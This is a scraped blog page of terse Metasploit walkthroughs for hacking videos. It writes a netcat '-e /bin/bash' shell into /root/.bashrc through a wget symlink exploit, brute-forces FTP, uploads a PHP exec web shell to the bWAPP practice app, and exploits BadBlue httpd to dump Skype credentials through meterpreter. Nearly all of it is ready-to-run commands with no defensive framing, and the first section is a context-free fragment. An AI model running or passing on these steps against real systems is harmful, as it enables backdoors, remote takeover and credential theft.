msf > use auxiliary/server/wget_symlink_file_write msf auxiliary(wget_symlink_file_write) > show options msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /root/.bashrc msf auxiliary(wget_symlink_file_write) > set TARGET_DATA nc localhost 2222 -e /bin/bash & msf auxiliary(wget_symlink_file_write) > exploit
nc -lvp 2222 wget -m ftp://192.168.2.104:2121/
The video shows how to exploit bWAPP through FTP and Webdav using metasploit framework. Here are the steps:
# msfconsole msf > search ftp_login msf > auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > show options msf auxiliary(ftp_login) > set USERNAME anonymous msf auxiliary(ftp_login) > show options msf auxiliary(ftp_login) > set RHOSTS 192.168.25.139 msf auxiliary(ftp_login) > exploit msf auxiliary(ftp_login) > search webdav_scanner msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner msf auxiliary(webdav_scanner) > show options msf auxiliary(webdav_scanner) > set RHOSTS 192.168.25.139 msf auxiliary(webdav_scanner) > set PATH /webdav/ msf auxiliary(webdav_scanner) > exploit # ftp ftp> o (to) 192.168.25.139 Name (192.168.25.139:root): anonymous Password: ftp> ls ftp> put backdoor.php
<?php print_r(($_GET['x'])?exec($_GET['x']):''); >?
192.168.25.139/webdav/backdoor.php?x=ls
192.168.25.139/webdav/backdoor.php?x=pwd
The video shows how to dump Skype hashes using metasploit framework and the BadBlue httpd 2.7. Here are the steps:
nmap -sS -sV 192.168.25.129 msf> use exploit/windows/http/badblue_passthru msf exploit(badblue_passthru) > set RHOST 192.168.25.129 msf exploit(badblue_passthru) > exploit meterpreter > sysinfo meterpreter > ipconfig meterpreter > background msf exploit(badblue_passthru) > search skype msf exploit(badblue_passthru) > use post/windows/gather/credentials/skype msf post(skype) > set SESSION 2 msf post(skype) > exploit
© 2024 Slingshot Orbit of Technology. All Rights Reserved. Powered by WordPress. Designed by 